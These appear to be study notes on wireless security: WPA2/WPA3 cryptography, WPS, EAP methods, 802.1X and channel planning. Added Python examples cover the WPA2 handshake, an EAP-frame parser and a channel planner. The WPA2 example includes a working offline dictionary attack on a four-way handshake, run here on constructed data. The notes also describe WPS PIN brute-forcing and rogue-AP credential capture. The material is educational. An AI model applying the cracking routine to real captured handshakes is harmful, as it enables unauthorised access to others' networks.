3.4 Wireless Security Settings
Wireless Cryptography
WPA2 uses CCMP (Counter Mode with CBC-MAC Protocol) - AES in counter mode for confidentiality, CBC-MAC for integrity - the PMK is derived from the PSK with PBKDF2 (passphrase + SSID), so a captured four-way handshake can be brute-forced offline
WPA3 uses GCMP (Galois/Counter Mode Protocol) - AES-GCM, confidentiality and integrity in one pass (GCMP-256 is required in WPA3-Enterprise 192-bit mode) - WPA3-Personal replaces the PSK handshake with SAE (Simultaneous Authentication of Equals): both sides prove knowledge of the password and a unique session key is derived per connection, so a captured exchange gives an attacker nothing to test password guesses against offline, and earlier sessions stay protected if the password later leaks (forward secrecy) - WPA3-Enterprise is WPA3 with 802.1X authentication, i.e. the same thing as WPA3-802.1X
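As an added worked example (not part of these notes), the Python below derives the WPA2 PMK and Key Confirmation Key exactly as IEEE 802.11i specifies, builds message 2 of the four-way handshake with its MIC, and then runs the offline dictionary attack that a captured handshake permits. The SSID, passphrase, MAC addresses, nonces and key-data contents are all constructed; the EAPOL-Key frame layout and the PRF/MIC construction are the real ones. SAE has no equivalent weakness: its PMK comes out of the Dragonfly commit/confirm exchange, so every password guess costs the attacker a live exchange with the access point instead of local CPU time.

```python
# Added example, not from the original notes: what a WPA2-PSK four-way handshake
# leaks and why the WPA3 SAE handshake does not. Every value below (SSID, passphrase,
# MAC addresses, nonces, key data) is constructed test data.
import hashlib
import hmac

MIC_OFFSET = 81    # byte offset of the 16-byte MIC inside an EAPOL-Key frame
NONCE_OFFSET = 17  # byte offset of the 32-byte Key Nonce inside an EAPOL-Key frame


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK (= the PSK) per IEEE 802.11i: PBKDF2-HMAC-SHA1, SSID as salt, 4096 rounds, 256 bits."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa2_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """First 128 bits of the PTK: the Key Confirmation Key that signs the EAPOL-Key frames."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_key_frame(snonce: bytes, key_data: bytes, mic: bytes = bytes(16)) -> bytes:
    """Message 2 of the handshake (EAPOL-Key, RSN descriptor, CCMP key info = 0x010a)."""
    body = (
        b"\x02" + b"\x01\x0a" + b"\x00\x10"   # descriptor type, key info, key length
        + bytes(8)                              # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)       # key IV, key RSC, key ID
        + mic
        + len(key_data).to_bytes(2, "big") + key_data
    )
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, type Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (CCMP): HMAC-SHA1 over the frame with the MIC field
    zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def sta_send_msg2(passphrase, ssid, aa, spa, anonce, snonce, key_data):
    """What the station transmits: message 2 with a MIC proving it holds the PMK."""
    kck = wpa2_kck(wpa2_pmk(passphrase, ssid), aa, spa, anonce, snonce)
    frame = eapol_key_frame(snonce, key_data)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack_handshake(ssid, aa, spa, anonce, msg2, wordlist):
    """Offline dictionary attack: SSID, both MACs, both nonces and the MIC are all in the
    capture, so each guess costs only local CPU time and never touches the AP."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        kck = wpa2_kck(wpa2_pmk(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), mic):
            return guess
    return None


def demo():
    ssid = "corp-wifi"
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # AP and STA MACs
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))                 # fixed for the demo
    key_data = b"\x30\x14" + bytes(20)                                      # stand-in RSN IE
    msg2 = sta_send_msg2("letmein2024", ssid, aa, spa, anonce, snonce, key_data)
    return crack_handshake(ssid, aa, spa, anonce, msg2,
                           ["password", "12345678", "letmein2024", "corp-wifi"])


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

The PBKDF2 step is the only expensive part, and it depends on nothing but the passphrase and SSID; that is why precomputed tables work against common SSIDs and why a long random passphrase is the only real defence on WPA2-PSK.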
Wireless Authentication Methods
Credentials - either a shared password / pre-shared key (PSK) or centralized authentication (802.1X)
802.1X authenticates users individually against an authentication server (e.g. RADIUS, LDAP) instead of one password shared by everyone
Captive portal = web page users are presented with before they are granted broader access to the network - provides authentication to a network - the access table recognizes a client that has not authenticated and redirects its first web request to the portal; once the user authenticates, that client's MAC/IP is allowed through - usually sits on an open network, so it controls access but does not by itself encrypt the wireless traffic
WPS (Wi-Fi Protected Setup) = simplifies joining a device to the network: instead of typing the PSK or configuring 802.1X, the user enters an 8-digit PIN, pushes a button on the access point, or taps using Near-Field Communication (NFC) - the PIN method is weak: the PIN is validated in two halves, so it can be brute-forced online in roughly 11,000 attempts, after which the attacker is handed the PSK - disable WPS, or at least the PIN method, wherever possible
Wireless Authentication Protocols
Extensible authentication protocol (EAP) = authentication framework that allows for the use of different authentication methods for secure network access - EAP is not an authentication method like MS-CHAPv2, but a framework that enables networking vendors to develop and install new authentication methods, known as EAP methods
IEEE 802.1X = port-based network access control: you don't get access to the network until you authenticate - used with RADIUS, LDAP, TACACS+
Supplicant - the client that wants to connect to the network
Authenticator - typically a network switch or wireless access point; acts as a go-between, relaying EAP between the supplicant and the authentication server without being able to read the credential itself
Authentication server - usually a RADIUS server that holds the credentials and decides whether to allow or deny the supplicant
EAP-FAST (Flexible Authentication via Secure Tunneling) - the authentication server (AS) and supplicant share a Protected Access Credential (PAC) that is used to build the secure tunnel - needs a RADIUS server - the PAC has to be provisioned securely (out of band or via authenticated provisioning); anonymous in-band provisioning is where it gets attacked
PEAP (Protected Extensible Authentication Protocol) - encapsulates EAP in a TLS tunnel - the AS presents a digital certificate instead of a PAC; the client does not need a certificate - inside the tunnel the user authenticates with MS-CHAPv2 (typically checked against Active Directory) or with Generic Token Card (GTC), e.g. a hardware token generator - the client must validate the server certificate: if it doesn't, a rogue AP with its own certificate can terminate the tunnel and capture the MS-CHAPv2 exchange
EAP-TLS - requires digital certificates on the AS and on every client device (mutual certificate authentication) - the TLS handshake itself is the authentication; no password is sent - strongest of the common methods, but needs a PKI to issue and revoke client certificates
EAP-TTLS (EAP Tunneled Transport Layer Security) - like PEAP, builds a TLS tunnel with a certificate on the AS only, not on every device - can tunnel other authentication protocols (PAP, CHAP, MS-CHAPv2, other EAP methods) inside the same TLS tunnel
RADIUS Federation - members of one organization can authenticate to the network of another organization - the visited network's RADIUS server proxies the request to the user's home RADIUS server based on the realm in the identity (user@example.edu); eduroam is the classic example - analogous to using a Gmail account to sign in to other websites - commonly uses 802.1X with EAP to authenticate
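The EAP framework and the 802.1X roles above are easiest to see on the wire. The following is an added example (not part of these notes): a parser for the EAPOL/EAP frames that carry an 802.1X exchange, plus the two checks a reviewer of a capture applies, namely whether the outer identity leaks a real username and whether the negotiated method ran inside a server-authenticated tunnel. The exchange at the bottom is constructed, not a real capture; the type codes are the IANA-registered EAP method numbers, and the method-to-name table and `TUNNELED` set are this example's own.

```python
# Added example, not from the original notes: a parser for the EAPOL/EAP frames that
# carry an 802.1X exchange, with the checks a reviewer of a capture would apply.
# The exchange in demo_exchange() is constructed, not a real capture.
import struct

EAPOL_EAP_PACKET, EAPOL_START = 0, 1
EAP_REQUEST, EAP_RESPONSE, EAP_SUCCESS, EAP_FAILURE = 1, 2, 3, 4
EAP_IDENTITY, EAP_NAK = 1, 3
EAP_METHODS = {4: "MD5-Challenge", 6: "GTC", 13: "EAP-TLS", 17: "LEAP",
               21: "EAP-TTLS", 25: "PEAP", 26: "EAP-MSCHAPv2", 43: "EAP-FAST"}
# Methods that authenticate the server (certificate or PAC) and tunnel the user credential.
TUNNELED = {13, 21, 25, 43}


def parse_eapol(frame: bytes):
    """EAPOL header: version(1) packet type(1) body length(2)."""
    if len(frame) < 4:
        raise ValueError("truncated EAPOL header")
    version, ptype, blen = struct.unpack("!BBH", frame[:4])
    if len(frame) < 4 + blen:
        raise ValueError("EAPOL body shorter than declared length")
    return version, ptype, frame[4:4 + blen]


def parse_eap(body: bytes):
    """EAP packet: code(1) identifier(1) length(2) [type(1) type-data] (RFC 3748)."""
    if len(body) < 4:
        raise ValueError("truncated EAP header")
    code, ident, length = struct.unpack("!BBH", body[:4])
    if length < 4 or length > len(body):
        raise ValueError("bad EAP length")
    if code in (EAP_REQUEST, EAP_RESPONSE):
        if length < 5:
            raise ValueError("Request/Response without a type")
        return code, ident, body[4], body[5:length]
    return code, ident, None, b""


def analyze_exchange(frames):
    """Walk one supplicant <-> authenticator exchange and report what it reveals."""
    report = {"identity": None, "server_proposed": [], "supplicant_accepts": [],
              "negotiated": None, "result": None, "warnings": []}
    for frame in frames:
        _, ptype, body = parse_eapol(frame)
        if ptype != EAPOL_EAP_PACKET:
            continue  # EAPOL-Start / EAPOL-Logoff carry no EAP payload
        code, _, eap_type, data = parse_eap(body)
        if code == EAP_RESPONSE and eap_type == EAP_IDENTITY:
            report["identity"] = data.decode("utf-8", "replace")
        elif code == EAP_REQUEST and eap_type in EAP_METHODS:
            report["server_proposed"].append(EAP_METHODS[eap_type])
        elif code == EAP_RESPONSE and eap_type == EAP_NAK:
            # A Nak lists the method types the supplicant is willing to use instead.
            report["supplicant_accepts"] = [EAP_METHODS.get(t, f"type {t}") for t in data]
        elif code == EAP_RESPONSE and eap_type in EAP_METHODS:
            report["negotiated"] = eap_type  # the supplicant answered this method
        elif code in (EAP_SUCCESS, EAP_FAILURE):
            report["result"] = "success" if code == EAP_SUCCESS else "failure"

    ident = report["identity"]
    if ident and not ident.startswith("anonymous"):
        report["warnings"].append(
            f"outer identity {ident!r} is sent in cleartext before any tunnel exists; "
            "use an anonymous outer identity with PEAP/TTLS")
    if report["negotiated"] is not None and report["negotiated"] not in TUNNELED:
        report["warnings"].append(
            f"{EAP_METHODS[report['negotiated']]} ran without a server-authenticated "
            "TLS tunnel; a rogue authenticator can harvest the credential")
    return report


def eap_frame(code, ident, eap_type=None, data=b""):
    """Build one EAPOL-encapsulated EAP packet (helper for the constructed exchange)."""
    eap = struct.pack("!BBH", code, ident, 4 + (1 + len(data) if eap_type is not None else 0))
    if eap_type is not None:
        eap += bytes([eap_type]) + data
    return struct.pack("!BBH", 2, EAPOL_EAP_PACKET, len(eap)) + eap


def demo_exchange():
    """Server first offers MD5-Challenge; the supplicant Naks it and PEAP is negotiated."""
    return [
        struct.pack("!BBH", 2, EAPOL_START, 0),                     # supplicant: EAPOL-Start
        eap_frame(EAP_REQUEST, 1, EAP_IDENTITY),                    # authenticator: who are you?
        eap_frame(EAP_RESPONSE, 1, EAP_IDENTITY, b"alice"),         # supplicant: outer identity
        eap_frame(EAP_REQUEST, 2, 4, b"\x10" + bytes(16)),          # server: MD5-Challenge (weak)
        eap_frame(EAP_RESPONSE, 2, EAP_NAK, bytes([25, 13])),       # supplicant: PEAP or EAP-TLS only
        eap_frame(EAP_REQUEST, 3, 25, b"\x20"),                     # server: PEAP, TLS start flag
        eap_frame(EAP_RESPONSE, 3, 25, b"\x00" + b"\x16\x03\x01"),  # supplicant: stand-in TLS record
        eap_frame(EAP_SUCCESS, 4),                                  # server: success after inner auth
    ]


if __name__ == "__main__":
    for key, value in analyze_exchange(demo_exchange()).items():
        print(f"{key}: {value}")
```

Everything the parser extracts is visible to anyone within radio range, including a rogue access point: the identity, the methods the server offers, and the methods the supplicant says it will accept. That is why supplicant profiles should pin the server certificate and the allowed method rather than letting the network choose.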
Installing Wireless Networks
Site survey = determining the existing wireless landscape (neighboring access points, their channels, signal strength, sources of interference) before installing - usually paired with a heat map that shows wireless signal strength across the floor plan
Overlapping channels cause frequency conflicts - use non-overlapping channels (in 2.4 GHz only channels 1, 6 and 11 don't overlap each other; 5 GHz offers many more)
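To make the channel-overlap rule concrete, here is an added example (not from these notes): a small 2.4 GHz channel planner that scores each candidate channel against site-survey data and recommends the least-contended one. The survey rows are constructed; the channel centre frequencies (2407 + 5n MHz, channel 14 at 2484 MHz) and the 22 MHz DSSS channel width are the real values, and the interference score is this example's own weighting of neighbour power by spectral overlap.

```python
# Added example, not from the original notes: turn site-survey data into a 2.4 GHz
# channel recommendation. SURVEY below is constructed sample data.
CHANNEL_WIDTH_MHZ = 22  # 802.11b DSSS occupied bandwidth; 802.11g/n use ~20 MHz


def center_freq_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz channel: 2407 + 5n MHz, channel 14 at 2484 MHz."""
    if channel == 14:
        return 2484
    if 1 <= channel <= 13:
        return 2407 + 5 * channel
    raise ValueError(f"not a 2.4 GHz channel: {channel}")


def overlap_fraction(ch_a: int, ch_b: int, width: int = CHANNEL_WIDTH_MHZ) -> float:
    """1.0 for co-channel, falling to 0.0 once the centres are a full channel width apart."""
    delta = abs(center_freq_mhz(ch_a) - center_freq_mhz(ch_b))
    return max(0.0, (width - delta) / width)


def non_overlapping_channels(channels=range(1, 12), width: int = CHANNEL_WIDTH_MHZ):
    """Greedily pick channels that do not overlap anything already picked."""
    chosen = []
    for ch in channels:
        if all(overlap_fraction(ch, c, width) == 0.0 for c in chosen):
            chosen.append(ch)
    return chosen


def interference_score(candidate: int, survey) -> float:
    """Neighbour power in mW (from dBm), weighted by how much of it lands on the candidate.

    survey rows are (ssid, channel, rssi_dbm) tuples as a site-survey tool would report.
    """
    return sum(overlap_fraction(candidate, ch) * 10 ** (rssi_dbm / 10)
               for _, ch, rssi_dbm in survey)


def recommend_channel(survey, candidates=range(1, 12)) -> int:
    """Lowest interference score wins; ties go to the lowest channel number."""
    return min(candidates, key=lambda ch: (interference_score(ch, survey), ch))


# Constructed survey: a strong neighbour on 1, a moderate one on 6, a weak one on 3.
SURVEY = [("neighbor-A", 1, -40), ("neighbor-B", 6, -50), ("cafe-guest", 3, -70)]

if __name__ == "__main__":
    print("non-overlapping set:", non_overlapping_channels())
    for ch in (1, 6, 11):
        print(f"channel {ch:2d}: score {interference_score(ch, SURVEY):.3e} mW")
    print("recommended channel:", recommend_channel(SURVEY))
```

The greedy pass over channels 1 to 11 reproduces the familiar 1/6/11 set; the score is what a survey tool's "best channel" button computes, and rerunning it after a neighbour changes channel is cheaper than guessing. On a congested 2.4 GHz floor the honest answer is often to move clients to 5 GHz rather than to find a clean channel that doesn't exist.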